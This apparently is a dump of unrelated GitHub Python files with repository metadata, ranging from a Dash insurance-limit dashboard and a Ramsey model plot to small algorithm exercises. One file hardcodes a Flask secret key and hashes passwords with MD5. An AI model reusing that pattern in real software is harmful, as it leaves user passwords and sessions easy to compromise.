/tutorial/snippets/permissions.py
a42b29204436ae53823a6a8aff8bf895527515ec
[ "MIT" ]
permissive
antoniocarlosortiz/django-rest-framework-sample
1fc8b11af2aa1cacfbbc2c3363e097262eec7aee
45ff0213b4a74566c8571c498c67adf66b420d3e
refs/heads/master
2021-01-01T05:18:51.457373
2016-04-23T18:28:12
2016-04-23T18:28:12
56,934,397
0
1
null
null
null
null
UTF-8
Python
false
false
474
py
from rest_framework import permissions class IsOwnerOrReadOnly(permissions.BasePermission): """ Custom permission to only allow owners of an object to edit it. """ def has_object_permission(self, request, view, obj): # Read permissions are allowed to any request. # so we'll always allow GET, HEAD or OPTIONS requests. if request.method in permissions.SAFE_METHODS: return True return obj.owner == request.user
[ "ortizantoniocarlos@gmail.com" ]
ortizantoniocarlos@gmail.com
b81fbe136d30d1cc561a5d652413f0cc5ab24af0
48828cdb69093b261f134c664cad7bdb1bf01b10
/_config/hash.py
324c90cd5ea71c75011d82a92978cef837f32323
[]
no_license
404neko/PageCat
cb2178efee7f09d5f8d412f42810b4d4a006f559
1deda59694624b3048754fdc76aeae286cd8a679
refs/heads/master
2021-01-17T17:35:26.372506
2016-05-02T10:56:13
2016-05-02T10:56:13
52,928,350
0
0
null
null
null
null
UTF-8
Python
false
false
203
py
import hashlib flask_secret_key = '233' salt = '2333' def uhash(password,salt): pre_hash = password[0]+salt+password[1:] Hash=hashlib.md5() Hash.update(pre_hash) return Hash.hexdigest()
[ "404neko@gmail.com" ]
404neko@gmail.com
5cace677c0248096c96561d057f04dc8d7c24177
c96f37e005b5dc6ef96ef871222a36c6920102e6
/MotionFunctions.py
d720bf1a8499891d8b35362de3a874f4f0573848
[]
no_license
shrutisub/robot
eef31ba3c1d396e699ce37fecd45fa1a74859739
a70e246a078c02d8085b9eed7d8d45acb5a5351f
refs/heads/master
2021-08-30T07:23:14.971463
2017-12-16T18:15:29
2017-12-16T18:15:29
114,481,019
0
0
null
null
null
null
UTF-8
Python
false
false
1,045
py
import numpy as np import time def PTPtoConfiguration(start_cfg, target_cfg, motiontype): """PTP path planning :param start_cfg: Current axis angle of the robot :type start_cfg: array of floats :param target_cfg: Target angle of the robot :type target_cfg: array of floats :param motiontype: Type of motion (asynchronous, synchronous, fully synchronous) :type motiontype: int :returns: Array containing the axis angles of the interpolated path :rtype: matrix of floats """ trajectory = np.empty([100, 6]) #TODO: Implement PTP (Replace pseudo implementation with your own code)! Consider the max. velocity and acceleration of each axis diff = target_cfg - start_cfg delta = diff / 100.0 for i in xrange(100): trajectory[i] = start_cfg + (i*delta) trajectory[99] = target_cfg return trajectory def Move(robot, trajectory): for i in range(trajectory.shape[0]): robot.SetDOFValues(trajectory[i]) time.sleep(0.01)
[ "noreply@github.com" ]
noreply@github.com
c412835e863548366c31fa22434e45e614059113
56278a6e508ce1a282270f90f1cd9984edd14965
/tests/test_validation/_test_utils.py
ae430d81167f643c218fc773e99d0fc4cf3c2974
[ "MIT" ]
permissive
gc-ss/py-gql
3d5707938e503dc26addc6340be330c1aeb2aa76
5a2d180537218e1c30c65b2a933fb4fe197785ae
refs/heads/master
2023-04-10T05:21:24.086980
2020-04-01T14:18:20
2020-04-01T14:18:20
null
0
0
null
null
null
null
UTF-8
Python
false
false
1,463
py
# -*- coding: utf-8 -*- from py_gql._string_utils import dedent from py_gql.lang import parse from py_gql.validation import validate_ast from py_gql.validation.validate import SPECIFIED_RULES, default_validator def _ensure_list(value): if isinstance(value, list): return value else: return [value] def assert_validation_result( schema, source, expected_msgs=None, expected_locs=None, checkers=None ): # Prints are here so we can more easily debug when running pytest with -v expected_msgs = expected_msgs or [] expected_locs = expected_locs or [] print(source) result = validate_ast( schema, parse(dedent(source), allow_type_system=True), validators=[ lambda s, d, v: default_validator( s, d, v, validators=(checkers or SPECIFIED_RULES) ) ], ) errors = result.errors msgs = [str(err) for err in errors] locs = [[node.loc for node in err.nodes] for err in errors] print(" [msgs] ", msgs) print(" [locs] ", locs) assert msgs == expected_msgs if expected_locs: assert locs == [_ensure_list(l) for l in expected_locs] def assert_checker_validation_result( checker, schema, source, expected_msgs=None, expected_locs=None ): assert_validation_result( schema, source, expected_msgs=expected_msgs, expected_locs=expected_locs, checkers=[checker], )
[ "c.lirsac@gmail.com" ]
c.lirsac@gmail.com
a30f1f5184e240fdb168d288874791f7260c7029
cdbb11473dc8d34767a5916f9f85cb68eb2ca3f2
/core/helpers.py
a9cf1b2ad8c669f8aac1b940187d7a46adde3660
[]
no_license
skyride/evestats
fb2a1a248952771731dcfecadab7d02b1f08cd4b
4bd2153f65c084b478272513733dcc78f9a0ef98
refs/heads/master
2020-03-23T13:50:19.216870
2018-08-05T19:19:47
2018-08-05T19:19:47
141,640,834
0
0
null
null
null
null
UTF-8
Python
false
false
578
py
from sde.models import Type def generate_breadcrumb_trail(marketgroup): def recurse(node): """Return an list containing the path to this trail""" if isinstance(node, dict): return [] elif isinstance(node, Type): return [*recurse(node.market_group), node] elif node.parent is None: return [node] else: return [*recurse(node.parent), node] return [ { "name": "Market", "root": True }, *recurse(marketgroup) ]
[ "adam.findlay@mercurytide.co.uk" ]
adam.findlay@mercurytide.co.uk
5b625b525d193a50347763599fcc98a42ce55dcc
732c63fef3f138d22eb3c39dff6bdbd797a9bf75
/insertion-del-traversing.py
15ad98a768c0f436b7c666c69d05efbe0005dcce
[]
no_license
yagavardhini/class-and-objects
8bb2c69f35553635c05a74c8b1ab5057bd7c8ee7
4235a45c985272cbdc1456c033551e0c77b46a2a
refs/heads/master
2020-07-02T03:49:23.553965
2019-08-15T08:53:37
2019-08-15T08:53:37
201,407,418
0
0
null
null
null
null
UTF-8
Python
false
false
837
py
class Node: def __init__(self,data): self.data=data self.nextt=None class SLL: def __init__(self): self.head=None def insertAtBeg(self,data): temp=Node(data) temp.nextt=self.head self.head=temp def delAtBeg(self): temp=self.head self.head=self.head.nextt temp.nextt=None def printList(self): temp=self.head while temp!=None: print(temp.data,"==>",end='') temp=temp.nextt print("None") obj=SLL() ch=0 while ch!=4: print("Linked list implementation\n","1.Insertion at begining 2. Deletion 3. Print Llist 4. Exit") ch=int(input()) if ch==1: print("enter value of the node") data=input() obj.insertAtBeg(data) obj.printList() elif ch==2: obj.delAtBeg() obj.printList() elif ch==3: obj.printList() ©
[ "noreply@github.com" ]
noreply@github.com
9fa46ad09d0359bf5046afbe894f2fc153a4e49b
a9de0373f6275a9d6c74701f43306842c1cab60e
/singleInstance.py
325394d63a31d04aa4713cf79e8e8993ed9f4c31
[]
no_license
carrotshub/ExDemo
3bf0c2f82192186a81643232457e4b9776c1ed9a
00a12dac0175726078e78f9868f98391eaf7fb6c
refs/heads/master
2020-04-13T01:22:08.152531
2019-01-09T13:10:39
2019-01-09T13:10:39
162,871,886
0
0
null
null
null
null
UTF-8
Python
false
false
751
py
# -*- coding: utf8 -*- # 使用装饰器实现单例模式 # 第一种方法类作为装饰器 class Single(object): def __init__(self,cls): self._cls = cls self._instances = None def __call__(self, *args, **kwargs): if not self._instances: self._instances = self._cls(*args) return self._instances @Single class A(object): def __init__(self,name): self.name = name a = A('zhangsan') b = A('lisi') print(a is b) # 第二种,使用函数作为装饰器 def single1(cls): s = [] def wrapper(*args, **kwargs): if not s: s.append(cls(*args, **kwargs)) print(args) return s return wrapper @single1 class B(object): def __init__(self, name): self.name = name a1 = B('zhangsam') b1 = B('BOb') print(a1 is b1)
[ "1398141580@qq.com" ]
1398141580@qq.com
913f443dfbaa96309422d8d52d60c558de4b9c33
2f1ac001742fa3e117e1b900a26ac0afb97f8967
/app.py
6654b10d9a5d022143a5903a8806571608b92145
[]
no_license
debugDoug/carrier_limit_dash
f67411df48c24bdb609211542146dfd936800138
348830bbb4c4e7f9043008f8b946f97084501830
refs/heads/master
2022-11-11T01:11:24.206897
2020-06-25T21:45:59
2020-06-25T21:45:59
275,017,556
1
0
null
null
null
null
UTF-8
Python
false
false
16,081
py
# -*- coding: utf-8 -*- """ Created on Sun Jun 21 08:11:43 2020 @author: 1197058 """ import dash from dash.dependencies import Input, Output import dash_core_components as dcc import dash_html_components as html import pandas as pd import numpy as np import dash_table import plotly.express as px #hey def generate_table(dataframe, max_rows=100): return html.Table([ html.Thead( html.Tr([html.Th(col) for col in dataframe.columns]) ), html.Tbody([ html.Tr([ html.Td(dataframe.iloc[i][col]) for col in dataframe.columns ]) for i in range(min(len(dataframe), max_rows)) ]) ]) #%% Load in IFCL df = pd.read_excel(r'M:\Workspace\Doug\Carrier Limit Tracking\Data\DailyWeekly\062220_Inforced Carrier Limit.xlsx') # drop Centauri df = df[df['Carrier Display Name'] != 'Centauri Specialty Insurance Company'] # drop Channel and Lloyds - DBD Slip (100% Channel) (as per Craig) and remove Harco (counted in iPartners report) #df = df[df['Carrier Display Name'] != 'Argo Re'] #df = df[df['Carrier Display Name'] != 'Ariel'] df = df[df['Carrier Display Name'] != 'Channel-DBD'] df = df[df['Carrier Display Name'] != 'Lloyds - DBD Slip (100% Channel)'] df = df[df['Carrier Display Name'] != 'Harco National Insurance Company'] df = df[df['Carrier Display Name'] != 'Exclude'] # change S4242 Re to Syndicate 4242 df['Carrier Display Name'].replace("S4242 Re", "Syndicate 4242", inplace=True) #change Exclude to QBE #df['Carrier Display Name'].replace("Exclude","QBE", inplace=True) # change Crum & Forster_PBU to Crum and Forster df['Carrier Display Name'].replace("Crum & Forster_PBU","Crum and Forster", inplace=True) # change RenRe_PBU to RenRe df['Carrier Display Name'].replace("RenRe_PBU","RenRe", inplace=True) # change NF&M and BHSIC to Berkshire Hathaway df['Carrier Display Name'].replace("NF&M","Berkshire Hathaway", inplace=True) df['Carrier Display Name'].replace("BHSIC","Berkshire Hathaway", inplace=True) # change Ariel and Argo Re df['Carrier Display Name'].replace("Ariel", "Other", inplace=True) df['Carrier Display Name'].replace("Argo Re", "Other", inplace=True) # create macrozone column df['Microzone'].value_counts() df['Microzone'].isna().sum() df['Microzone'].fillna('UNKNOWN', inplace=True) microMacro = pd.read_excel(r'M:\Workspace\Doug\Carrier Limit Tracking\Data\DailyWeekly\MicroToMacro.xlsx') microMacro = dict(zip(microMacro.Microzone, microMacro.Macrozone)) df['Macrozone'] = df['Microzone'].map(microMacro) df.Macrozone.value_counts() check = df[df['Macrozone'].isna()] # create segment column def segment (row): if row['Carrier Display Name'] == 'Harco National Insurance Company': return 'HBU' if row['Carrier Display Name'] == 'Syndicate 2288_Harco Auth Participant': return 'HBU' elif row['Source System'] == 'Epicenter': return 'PBU' else: return 'MMBU' df['Segment'] = df.apply(lambda row: segment(row), axis=1) # print(df['Segment'].value_counts()) # change 2288 HBU name df['Carrier Display Name'].replace("Syndicate 2288_Harco Auth Participant", "Syndicate 2288", inplace=True) # create state col df['State'] = df.Microzone.str[:2] df['State'] = df['State'].astype(str) # create peril col wind_zones = ['AL','FL','GA','HI','LA','MA','MS','NC','NJ','NY','TX'] quake_zones = ['CA','OR','WA'] def peril (row): if row['Policy Number'][0] == 'A': # doesn't appear to exist anymore return 'App' if (row['Policy Number'][0] == 'E') & (row['State'] in (wind_zones)) : # EQX polcies, was NAC now HU return 'HU' if (row['Policy Number'][0] == 'E') & (row['State'] in (quake_zones)) : # EQX polcies, was NAC now EQ return 'EQ' if row['Policy Number'][:2] == 'IQ': # was QBE Excess now HU return 'HU' if row['Policy Number'][:2] == 'IC': # was FL-Admitted now HU return 'HU' if row['Policy Number'][5] == '0': return 'EQ' if row['Policy Number'][5] == '6': return 'HU' if row['Policy Number'][5] == '8': # was CGL now HU return 'HU' if row['Policy Number'][5] == '9': # was AOP now HU return 'HU' df['Peril'] = df.apply(lambda row: peril(row), axis=1) df['Peril'].value_counts() # create Month column df['Month-Year'] = pd.to_datetime(df['Policy Effective Date']).dt.to_period('M') df['Month-Year'] = df['Month-Year'].dt.strftime('%b-%Y') # create New/Renewal column def new_renew (row): if row['Policy Number'][-1] != '0': return 'Renewal' else: return 'New' df['New/Renewal'] = df.apply(lambda row: new_renew(row), axis=1) # print(df['New/Renewal'].value_counts()) ### check for duplicates ### df['Check_pol'] = df['Policy Number'].str[:16] # print(df['Check_pol'].nunique()) # print(df['Policy Number'].nunique()) unique = pd.DataFrame(df.groupby('Check_pol')["Policy Effective Date"].nunique()).reset_index() # merge grouped back to main df df = pd.merge(df, unique, how='left', on="Check_pol") # get df of duplicates (unique policy dates = 2) duplicates = df[df['Policy Effective Date_y']==2] # difference b/w expiring and renewing True=2018 duplicates.groupby([(duplicates["Policy Effective Date_x"] >= '2018-01-01') & (duplicates["Policy Effective Date_x"] <= '2019-12-31')])["Carrier Limit"].sum() # check values and drop duplicates from the df by finding rows with PED_y ==2 AND PED <= '2018-12-31' duplicates.groupby(duplicates['Policy Effective Date_x'].dt.year)['Policy Effective Date_y'].value_counts() df = df.drop(df[(df["Policy Effective Date_y"] == 2) & (df["Policy Effective Date_x"] <= '2019-12-31')].index) # get expiring/old pol number def getExpNumber(row): if row['New/Renewal'] == 'Renewal': val = row['Policy Number'][-2:] val = int(val) - 1 val = '0' + str(val) base_pol = row['Policy Number'][:-2] old_pol = base_pol + val return old_pol else: return 'None' df['Old Policy Number'] = df.apply(getExpNumber, axis=1) #%% generate some charts as tests df2 = df.groupby(['Carrier Display Name','Segment'])[['Carrier Limit']].sum() df2.reset_index(inplace=True) df2 = df2[df2['Segment'] != 'HBU'] # graph fig = px.bar(df2, x='Carrier Display Name', y='Carrier Limit', hover_data=['Segment'],color='Carrier Limit') df3 = df[df['Carrier Display Name'] == 'Syndicate 4242'] df3 = df3.groupby('Policy Effective Date_x')[['Carrier Limit']].sum() df3.reset_index(inplace=True) fig2 = px.line(df3, x='Policy Effective Date_x', y='Carrier Limit') df4 = df.groupby(['Carrier Display Name','Segment'])[['Carrier Limit']].sum() df4.reset_index(inplace=True) df4 = df4[df4['Segment'] != 'HBU'] df4['Carrier Limit'] = df4['Carrier Limit'].apply(lambda x : "{:,}".format(x)) df5 = df[df['Segment'] != 'HBU'] df5['Month-Year'] = pd.to_datetime(df5['Month-Year']) summary_pivot = pd.pivot_table(data=df5, values='Carrier Limit', index=['Carrier Display Name','Segment'], columns='Month-Year', aggfunc=np.sum, fill_value=0, margins=True) summary_pivot.reset_index(inplace=True) old_colNames = list(summary_pivot.columns[2:-1]) new_colNames = [] for i in summary_pivot.columns[2:-1]: i = i.strftime("%m-%Y") new_colNames.append(i) col_rename_dict = {i:j for i,j in zip(old_colNames,new_colNames)} summary_pivot.rename(columns=col_rename_dict, inplace=True) summary_pivot.columns = summary_pivot.columns.astype(str) #%% # CARRIER TAB df_carrier = df df_carrier['Carrier Limit'] = df_carrier['Carrier Limit'].astype(float) df_carrier = df.pivot_table(values='Carrier Limit', index=['Month-Year','Carrier Display Name'], aggfunc = sum, fill_value=0) df_carrier.reset_index(inplace=True) df_carrier['Month-Year'] = pd.to_datetime(df_carrier['Month-Year']) df_carrier = df_carrier.sort_values(by='Month-Year') fig_Carrier = px.line(df_carrier, x='Month-Year', y='Carrier Limit', color='Carrier Display Name') fig_Carrier.update_xaxes(rangeslider_visible=True, rangeselector=dict( buttons=list([ dict(count=1, label="1m", step="month", stepmode="backward"), dict(count=6, label="6m", step="month", stepmode="backward"), dict(count=1, label="YTD", step="year", stepmode="todate"), dict(count=1, label="1y", step="year", stepmode="backward"), dict(step="all") ]))) # get sum of limit for each carrier by segment and macrozone df_agg = df.groupby(['Carrier Display Name','Segment','Macrozone','Peril'])[['Carrier Limit']].sum() df_agg.reset_index(inplace=True) df_agg['Carrier Limit'] = df_agg['Carrier Limit'].apply(lambda x : "{:,}".format(x)) # create watch zones column watch_zones = ['CA Gtr Los Angeles','CA Gtr San Francisco','CA N Central Coast','CA N Coast','WA Washington', 'OR Oregon','FL Tri County','FL Panhandle','FL Southwest','FL Inland','FL West', 'FL East Coast','TX N Texas'] df_agg['Watch Zone'] = df_agg['Macrozone'].apply(lambda x: 'Yes' if x in watch_zones else 'No') available_carriers = df_agg['Carrier Display Name'].unique() available_segs = df_agg['Segment'].unique() available_mz = df_agg['Macrozone'].unique() available_wz = df_agg['Watch Zone'].unique() #%% # MACROZONE TAB watch_zones = ['CA Gtr Los Angeles','CA Gtr San Francisco','CA N Central Coast','CA N Coast','WA Washington', 'OR Oregon','FL Tri County','FL Panhandle','FL Southwest','FL Inland','FL West', 'FL East Coast','TX N Texas'] df_macrozone = df[(df['Macrozone'].isin(watch_zones)) & (df['Segment'] != 'HBU')] df_macrozone = df_macrozone.groupby(['Macrozone','Microzone','Carrier Display Name','Segment'])[['Carrier Limit']].sum() df_macrozone.reset_index(inplace=True) fig_WZ = px.bar(df_macrozone, x='Macrozone', y='Carrier Limit', color='Carrier Display Name', hover_data=['Segment','Microzone']) #%% # APP LAYOUT & STRUCTURE external_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css'] app = dash.Dash(__name__, external_stylesheets=external_stylesheets) app.layout = html.Div(children=[ dcc.Tabs([ dcc.Tab(label='All ICAT', children=[ html.H1(children='Carrier Limit Tracking!'), html.Div(children=''' Dash: A web application framework for Python. '''), html.H2(children='Graph of Commercial Inforce Limit'), dcc.Graph( id='example-graph', figure=fig ), html.H3(children='Graph of s4242 Limit'), dcc.Graph(figure=fig2), html.H4(children='Commercial Carriers Limit'), #generate_table(df4), dash_table.DataTable( id='practice_carrier_table', columns=[{"name": i, "id": i} for i in summary_pivot.columns], data = summary_pivot.to_dict('records'), ) #generate_table(df_carrier) ]), ## CARRIER TAB dcc.Tab(label='Carriers', children=[ html.H1(children='Carrier Limit'), # dash_table.DataTable( # id='practice_carrier_table', # columns=[{"name": i, "id": i} for i in df_carrier.columns], # data = df_carrier.to_dict('records'), # ) #generate_table(df_carrier) html.H2(children='Carrier Limit by Policy Inception Date'), html.Div(children='''Shows When Limit was Bound ''' ), # graph of all carriers and their limit by Pol Inception date dcc.Graph(figure=fig_Carrier), # dropdown for carrier name html.Div(children='''Select Carrier(s)'''), dcc.Dropdown( id='carrier_aggs_dd', options=[{'label':i, 'value':i} for i in available_carriers], value=[], multi=True ), # dropdown for segment html.Div(children='''Select Segment(s)'''), dcc.Dropdown( id='carrier_aggs_dd_segment', options=[{'label':i, 'value':i} for i in available_segs], value=[], multi=True ), # dropdown for Watch Zones html.Div(children='''Filter to Watch Zones or Rest'''), dcc.Dropdown( id='carrier_aggs_dd_wz', options=[{'label':i, 'value':i} for i in available_wz], value=[], multi=True ), # dropdown for macrozone html.Div(children='''Select Macrozone(s)'''), dcc.Dropdown( id='carrier_aggs_dd_mz', options=[{'label':i, 'value':i} for i in available_mz], value=[],#'CA Gtr Los Angeles','FL Tri County', 'TX N Texas'], multi=True ), # dash_table.DataTable( # id='carrier_aggs', # columns=[{"name": i, "id": i} for i in df_agg.columns], # data=df_agg.to_dict('records'), # ) html.Div(children=''' '''), dash_table.DataTable( id='carrier_aggs', columns = [{"name": i, "id": i,} for i in (df_agg.columns)]) ]), dcc.Tab(label='Macrozones', children=[ html.H1(children='Limit by Macrozone'), html.Div(children=''' Limit in Watch Zones (PML Drivers) '''), dcc.Graph(figure=fig_WZ) ]) ]) ]) @app.callback(Output('carrier_aggs', 'data'), [Input('carrier_aggs_dd', 'value'), Input('carrier_aggs_dd_segment', 'value'), Input('carrier_aggs_dd_mz', 'value'), Input('carrier_aggs_dd_wz', 'value')]) def update_rows(selected_carriers, selected_segs, selected_mz, selected_wz): carriers = list(selected_carriers) segs = list(selected_segs) mz = list(selected_mz) wz = list(selected_wz) if len(selected_carriers) >= 1: dff_agg = df_agg[df_agg['Carrier Display Name'].isin(carriers)] else: dff_agg = df_agg if len(selected_segs) >= 1: dfF_agg = dff_agg[dff_agg['Segment'].isin(segs)] else: dfF_agg = dff_agg if len(selected_mz) >= 1: dFF_agg = dfF_agg[dfF_agg['Macrozone'].isin(mz)] else: dFF_agg = dfF_agg if len(selected_wz) >= 1: dFFF_agg = dFF_agg[dFF_agg['Watch Zone'].isin(wz)] else: dFFF_agg = dFF_agg return dFFF_agg.to_dict('records') if __name__ == '__main__': app.run_server(debug=True) # colnames='Syndicate 2288' # test = df[df['Carrier Display Name'].isin(colnames)] # df4 = df[df['Segment'] != 'HBU'] # df4['Month-Year'] = pd.to_datetime(df4['Month-Year']) # summary_pivot = pd.pivot_table(data=df4, values='Carrier Limit', index=['Carrier Display Name','Segment'], # columns='Month-Year', aggfunc=np.sum, fill_value=0) # print(summary_pivot.style.format('{0:,.2f}').hide_index()) # summary_pivot.info() # df4.info()
[ "noreply@github.com" ]
noreply@github.com
bb6643f96de8854e77e2affffa552d014fb97e44
0d0d63e25b9afbf5b45880c747d758763829d01a
/ramseymodel.py
51d66cf8b5baed520aeea68bfcd78191a038d54a
[]
no_license
ecotyper/Ramseymodel
4056867ed0b887d0a434d20a6e35b29f7acff391
cf4e212df70dd36eb3d31187df3442ef3173c48d
refs/heads/master
2023-04-27T02:40:35.289041
2018-06-18T22:55:59
2018-06-18T22:55:59
null
0
0
null
null
null
null
UTF-8
Python
false
false
1,400
py
import numpy as np import matplotlib.pyplot as plt #パラメータ設定 a = 0.3 b = 0.99 d = 0.25 At = 1.0 numer = eval("(1/b+d-1)") #分子 denom = eval("a*At") #分母 exp = eval("1/(a-1)") #指数 #Δk=0軌跡の式 K = np.arange(0, 4, 0.01) def Ct(K): Ct = At * K**a - d * K return Ct #Δc=0軌跡の式 Kt = (numer/denom)**exp #消費と資本の軌跡グラフ作図 plt.plot(K,Ct(K)) #Δc=0軌跡のグラフ plt.vlines([Kt], 0, 1.0, "blue", linestyle='solid') #Δk=0軌跡のグラフ plt.ylim(0, 1) plt.plot(Kt,Ct(Kt),"ro") #双方の軌跡の交点を赤く表示 plt.xlabel("Kt") plt.ylabel("Ct", rotation=0) plt.text(2.5, 0.8, "ΔK=0") plt.text(1.5, 0.6, "ΔC=0") plt.show() #パラメータを追加 maxT = 30 #期間 #経路の計算 sC = np.empty(maxT) sC[0] = 0.65 #消費の初期値 sK = np.empty(maxT) sK[0] = Kt * 0.5 #資本の初期値 for t in range(maxT-1): sC[t+1] = b*sC[t] * (a*(sK[t]**a - sC[t]+(1-d)*sK[t])**(a-1)+1-d) sK[t+1] = sK[t]**a - sC[t] + (1-d)*sK[t] #資本と消費の経路グラフ作図 t = np.arange(0, 4, 1.0) plt.plot(sK, sC) plt.plot(K,Ct(K)) plt.vlines([Kt], 0, 1.5, "blue", linestyle='solid') plt.plot(Kt,Ct(Kt),"ro") plt.xlabel("Kt") plt.ylabel("Ct", rotation=0) plt.text(2.5, 0.8, "ΔK=0") plt.text(1.4, 0.55, "ΔC=0") plt.xlim(xmax=4) plt.ylim(ymax=1.5) plt.show()
[ "noreply@github.com" ]
noreply@github.com
a583ce9389fd5048cc2a217b72beb330eb02d48b
c6e042536814dadf338fb9e68246f6c17f1c4cfa
/FourierMy.py
cbf2bbeaadf8ff8e07f0a2d327d3b265dcb58f48
[]
no_license
NazarovDevelopment/Laba
0576ed2945ce486e32843f7b25d8afe2683248a8
036f2d473673edb6ad5754dc6408b4112d1b045e
refs/heads/master
2020-04-06T03:35:03.188331
2015-04-21T19:42:31
2015-04-21T19:42:31
33,953,662
0
0
null
null
null
null
UTF-8
Python
false
false
138
py
__author__ = 'Alexey' import numpy as np def forwardfourier(data): newfftdata = np.fft.fft(data) print(data) return newfftdata
[ "anazarov94@gmail.com" ]
anazarov94@gmail.com
1024bc3664adf719b87b2553b88c5466abfc7d84
a2311e330da598bca3a38a543f0dc7e1a3656edd
/genetic_algorithm/hw2/run_once.py
1e5c307bddcc06b217c6658072550eb6fd27f435
[]
no_license
hw5773/study
9c980390e814110bef4f4760d40ef0a491758f61
973b5a9d99538ee03c8fcaaa3448e761b13fbc99
refs/heads/master
2020-04-12T02:30:36.379631
2019-11-02T04:01:21
2019-11-02T04:01:21
55,757,394
0
0
null
null
null
null
UTF-8
Python
false
false
1,747
py
import os import sys graph_type = ["maxcut50.txt", "maxcut100.txt", "maxcut500.txt"] g = graph_type[int(sys.argv[2])] graph = "../graph/" + g representation = ["chromosome.o"] selection = ["tornament_selection.o"] crossover = ["reverse_crossover.o"] mutation = ["general_mutation.o"] replacement = ["general_replacement.o"] stop = ["rate_stop_condition.o"] common = "cost.o maxcut_once.o common.o" new_dir = sys.argv[1] os.system("rm -rf *.o") os.system("mkdir " + sys.argv[1]) os.system("gcc -c *.c") #for root, dirs, files in os.walk("./"): # for f in files: # if "fixedonepoint_crossover.o" in f: # crossover.append(f) # elif "decrease_mutation.o" in f: # mutation.append(f) # elif "general_replacement.o" in f: # replacement.append(f) # elif "chromosome.o" in f: # representation.append(f) # elif "stop_condition.o" in f: # stop.append(f) # elif "roulette_selection.o" in f: # selection.append(f) # else: # continue print crossover print mutation print replacement print representation print stop print selection for b in representation: for c in crossover: for m in mutation: for r in replacement: for st in stop: for se in selection: os.system("gcc -o maxcut " + common + " " + b + " " + " " + c + " " + m + " " + r + " " + st + " local_optimization.o " + se) for num in range(int(sys.argv[3]), int(sys.argv[3])+5): file_prefix = new_dir + "/" + g.split(".")[0] + "_binary_" + c.split("_")[0] + "_" + m.split("_")[0] + "_" + r.split("_")[0] + "_" + st.split("_")[0] + "_" + se.split("_")[0] + "_" + "ONCE_S0.7_M0.3_N1000_K1_P00.51_P4_KF4_T0.7_C0.5" os.system("./maxcut " + graph + " " + file_prefix + "_" + str(num) + ".res " + file_prefix + "_" + str(num) + ".csv")
[ "hw5773@gmail.com" ]
hw5773@gmail.com
fa3e65432481dc50669a709c3740fc9753628e14
8f0524fc0171e27a15f4cf5fb3fe48ef2053b40e
/leetcode/DP/edit_distance_formula.py
e9141de529dbc4bde7fdefe5cc4713fae1837147
[]
no_license
MohammedAlewi/competitive-programming
51514fa04ba03d14f8e00031ee413d6d74df971f
960da78bfa956cb1cf79a0cd19553af97a2aa0f3
refs/heads/master
2023-02-08T20:25:58.279241
2023-02-02T00:11:23
2023-02-02T00:11:23
222,710,225
1
0
null
null
null
null
UTF-8
Python
false
false
275
py
def edit_str(s1,s2,n,m): if n<0 or m<0: return max(m,n)+1 elif s1[n]==s2[m]: return edit_str(s1,s2,n-1,m-1) else: return min(edit_str(s1,s2,n-1,m-1),edit_str(s1,s2,n,m-1),edit_str(s1,s2,n-1,m)) +1 print(edit_str("kitten","sitting",5,6))
[ "rofyalewi@gmail.com" ]
rofyalewi@gmail.com
8c7ec1217dd7bc22b88439c1f406972e4f2a9006
3bae1ed6460064f997264091aca0f37ac31c1a77
/apps/cloud_api_generator/generatedServer/tasklets/rack/create/rack_create.py
3e407f24ace515e0974c5621850b08fc380425ff
[]
no_license
racktivity/ext-pylabs-core
04d96b80ac1942754257d59e91460c3a141f0a32
53d349fa6bee0ccead29afd6676979b44c109a61
refs/heads/master
2021-01-22T10:33:18.523799
2017-06-08T09:09:28
2017-06-08T09:09:28
54,314,984
0
0
null
2017-06-08T09:09:29
2016-03-20T11:55:01
Python
UTF-8
Python
false
false
174
py
__author__ = 'aserver' __tags__ = 'rack', 'create' __priority__= 3 def main(q, i, params, tags): params['result'] = '' def match(q, i, params, tags): return True
[ "devnull@localhost" ]
devnull@localhost
68f4d4b54fede867afc44c57daef7f694fc1ae4f
6777c78344998500252845572da51a7ddaaf40da
/script/minist_SVM_self.py
082490901d04fd4bd71ca124f6bc0d1f103d8cbe
[]
no_license
Chokurei/Kajima
2e1bfd74d997aba5d5218f10bce4655ccec7b5eb
4d5dd3bd56fe41473b4edb8836cb93d19a02bd9c
refs/heads/master
2021-04-06T20:18:52.624283
2018-03-15T17:47:31
2018-03-15T17:47:31
125,337,676
0
0
null
null
null
null
UTF-8
Python
false
false
1,403
py
#!/usr/bin/env python3 # -*- coding: utf-8 -*- """ Created on Fri Mar 2 11:39:49 2018 @author: kaku """ print(__doc__) import matplotlib.pyplot as plt from sklearn import datasets, svm, metrics digits = datasets.load_digits() images_and_labels = list(zip(digits.images, digits.target)) for index, (image, label) in enumerate(images_and_labels[:4]): plt.subplot(2, 4, index + 1) plt.axis('off') plt.imshow(image, cmap=plt.cm.gray_r, interpolation='nearest') plt.title('Training: %i'%label) n_samples = len(digits.images) # Change into m x n data = digits.images.reshape((n_samples, -1)) classifier = svm.SVC(gamma = 0.001) # We learn the digits on the first half of the digits classifier.fit(data[:n_samples//2], digits.target[:n_samples//2]) expected = digits.target[n_samples//2:] predicted = classifier.predict(data[n_samples//2:]) print('Classification report for classifier %s:\n%s\n' %(classifier, metrics.classification_report(expected, predicted))) print('Confusion matrix:\n%s'% metrics.confusion_matrix(expected, predicted)) images_and_predictions = list(zip(digits.images[n_samples//2:], predicted)) for index, (image, prediction) in enumerate(images_and_predictions[:4]): plt.subplot(2,4,index + 5) plt.axis('off') plt.imshow(image, cmap = plt.cm.gray_r, interpolation='nearest') plt.title('Prediction: %i' %prediction) plt.show()
[ "guozhilingty@gmail.com" ]
guozhilingty@gmail.com
7e0089c1234ae3609da6e14a0889584df5f17339
0f1b763baa14a13f91c4d1a56f0b9bea27320aeb
/venv/Lib/site-packages/sqlpharmacy/column_types.py
0ef7bd3abb5454f6e126aeb1ee0bde14410d3680
[]
no_license
tangleibest/untitled
9c775ddf35e34815f0b3d305c42915804e10470c
6672699da1ad897a660098d07f7ea4c9a70126bd
refs/heads/master
2020-04-19T02:04:04.740292
2019-01-28T03:29:07
2019-01-28T03:29:07
167,891,262
0
0
null
null
null
null
UTF-8
Python
false
false
885
py
